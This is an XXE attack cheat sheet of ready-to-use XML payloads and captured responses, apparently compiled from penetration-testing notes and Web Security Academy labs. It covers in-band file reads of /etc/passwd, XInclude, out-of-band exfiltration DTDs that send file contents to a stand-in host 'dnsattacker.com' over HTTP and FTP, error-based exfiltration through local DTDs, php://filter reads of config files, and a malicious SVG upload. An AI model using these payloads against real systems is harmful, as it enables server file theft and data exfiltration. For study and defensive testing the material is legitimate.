Internal Entity XML Injection

Link to this headingInternal Entity XML Injection

What Are XML External Entity (XXE) Attacks

Link to this headingReturn File in Response

Link to this headingENTITY Error Request

Request:

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

Response:

HTTP/1.1 400 Bad Request Content-Type: application/json Connection: close Content-Length: 1144 "Invalid product ID: root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync games❌5:60:games:/usr/games:/usr/sbin/nologin man❌6:12:man:/var/cache/man:/usr/sbin/nologin lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail❌8:8:mail:/var/mail:/usr/sbin/nologin news❌9:9:news:/var/spool/news:/usr/sbin/nologin uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy❌13:13:proxy:/bin:/usr/sbin/nologin www-data❌33:33:www-data:/var/www:/usr/sbin/nologin backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt❌100:65534::/nonexistent:/usr/sbin/nologin peter❌2001:2001::/home/peter:/bin/bash user❌2000:2000::/home/user:/bin/bash dnsmasq❌101:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin messagebus❌102:101::/nonexistent:/usr/sbin/nologin "

Link to this headingXinclude Error Request

Request:

productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1

Response:

Link to this headingReading the file through FTP

This is one of the better ways to read files because some files may have bad characters but this bypasses it.

XXE FTP Server - A {web,ftp}-server for XXE

Link to this headingReading the file through HTTP

Link to this headingUsing Entities

<?xml version="1.0" ?> <!DOCTYPE data SYSTEM "http://dnsattacker.com:9000/linux.dtd"> <data>&send;</data>

linux.dtd

<!ENTITY % passwd SYSTEM "file:///etc/passwd"> <!ENTITY % wrapper "<!ENTITY send SYSTEM 'http://dnsattacker.com:9000/%passwd;'>"> <!ENTITY % send SYSTEM "http://dnsattacker.com:9000/?CONTENTS_OF_PASSWD;">

Link to this headingUsing Entities for all characters

<?xml version="1.0" ?> <!DOCTYPE data SYSTEM "http://dnsattacker.com:9000/linux.dtd"> <data>&send;</data>

linux.dtd

<!ENTITY % file SYSTEM "file:///etc/fstab"> <!ENTITY % start "<!CDATA["> <!ENTITY % end "]]>"> <!ENTITY % wrapper "<!ENTITY all '%start;%file;%end;'>"> %wrapper;

Link to this headingUsing Entities Part 2

<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://dnsattacker.com:9000/linux.dtd"> %sp; %param1; ]> <r>&exfil;</r>

linux.dtd

<!ENTITY % data SYSTEM "file:///etc/passwd"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://dnsattacker.com:9000/%data;'>">

linux_ftp.dtd

<!ENTITY % data SYSTEM "file:///etc/passwd"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://dnsattacker.com:2121/%data;'>">

windows.dtd

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://dnsattacker.com:9000/%data;'>">

<?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file://nonexistent/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd; ]> <message>any text</message>

Link to this headingExfil File through Error

<?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % NUMBER ' <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file://nonexistent/%file;'>"> %eval; %error; '> %NUMBER; ]> <message>any text</message>

Link to this headingUsing a Malicious External DTD

Host this file on a Public Server:

<!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'https://ac611fac1e84e4e780370277011500c7.web-security-academy.net/?x=%file;'>"> %eval; %exfil;

Make this request to the server:

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "https://ac611fac1e84e4e780370277011500c7.web-security-academy.net/exploit"> %xxe; ]> <stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

View the Logs:

172.31.30.228 2019-12-12 19:47:16 +0000 "GET /exploit HTTP/1.1" 200 "User-Agent: Java/11.0.1" 172.31.30.228 2019-12-12 19:47:16 +0000 "GET /?x=2c8bd21baa0e HTTP/1.1" 200 "User-Agent: Java/11.0.1"

Link to this headingReturn File through Java Error

Host this file on a Public Server:

<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>"> %eval; %exfil;

Make this request to the server:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE message [ <!ENTITY % ext SYSTEM "https://ac921fe41e6d96b6805a1ff9013500a6.web-security-academy.net/exploit"> %ext; ]><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

Response:

HTTP/1.1 400 Bad Request Content-Type: application/json Connection: close Content-Length: 1201 "XML parser exited with non-zero code 1: /invalid/root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync games❌5:60:games:/usr/games:/usr/sbin/nologin man❌6:12:man:/var/cache/man:/usr/sbin/nologin lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail❌8:8:mail:/var/mail:/usr/sbin/nologin news❌9:9:news:/var/spool/news:/usr/sbin/nologin uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy❌13:13:proxy:/bin:/usr/sbin/nologin www-data❌33:33:www-data:/var/www:/usr/sbin/nologin backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt❌100:65534::/nonexistent:/usr/sbin/nologin peter❌2001:2001::/home/peter:/bin/bash user❌2000:2000::/home/user:/bin/bash dnsmasq❌101:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin messagebus❌102:101::/nonexistent:/usr/sbin/nologin (No such file or directory) "

Link to this headingReturn File through Java Error with Local DTD

Source

Request:

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamso ' <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; '> %local_dtd; ]> <stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

Response:

HTTP/1.1 400 Bad Request Content-Type: application/json Connection: close Content-Length: 1205 "XML parser exited with non-zero code 1: /nonexistent/root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync games❌5:60:games:/usr/games:/usr/sbin/nologin man❌6:12:man:/var/cache/man:/usr/sbin/nologin lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail❌8:8:mail:/var/mail:/usr/sbin/nologin news❌9:9:news:/var/spool/news:/usr/sbin/nologin uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy❌13:13:proxy:/bin:/usr/sbin/nologin www-data❌33:33:www-data:/var/www:/usr/sbin/nologin backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt❌100:65534::/nonexistent:/usr/sbin/nologin peter❌2001:2001::/home/peter:/bin/bash user❌2000:2000::/home/user:/bin/bash dnsmasq❌101:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin messagebus❌102:101::/nonexistent:/usr/sbin/nologin (No such file or directory) "

Link to this headingReading the file through PHP Schema

Using the php handler to get files:

<?xml version="1.0"?> <!DOCTYPE results [ <!ENTITY harmless SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/config.ini" > ]> <results> <result>&harmless;</result> </results>

Link to this headingWrite Files

Link to this headingUsing SVG

Upload a svg file then view the text that it has constructed.

Example SVG:

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

Link to this headingInternal Entity XML Injection

Link to this headingReturn File in Response

Link to this headingENTITY Error Request

Link to this headingXinclude Error Request

Link to this headingReading the file through FTP

Link to this headingReading the file through HTTP

Link to this headingUsing Entities

Link to this headingUsing Entities for all characters

Link to this headingUsing Entities Part 2

Link to this headingExfil File through Blind XXE

Link to this headingExfil File through Error

Link to this headingBlind XXE

Link to this headingUsing a Malicious External DTD

Link to this headingReturn File through Java Error

Link to this headingReturn File through Java Error with Local DTD

Link to this headingReading the file through PHP Schema

Link to this headingWrite Files

Link to this headingUsing SVG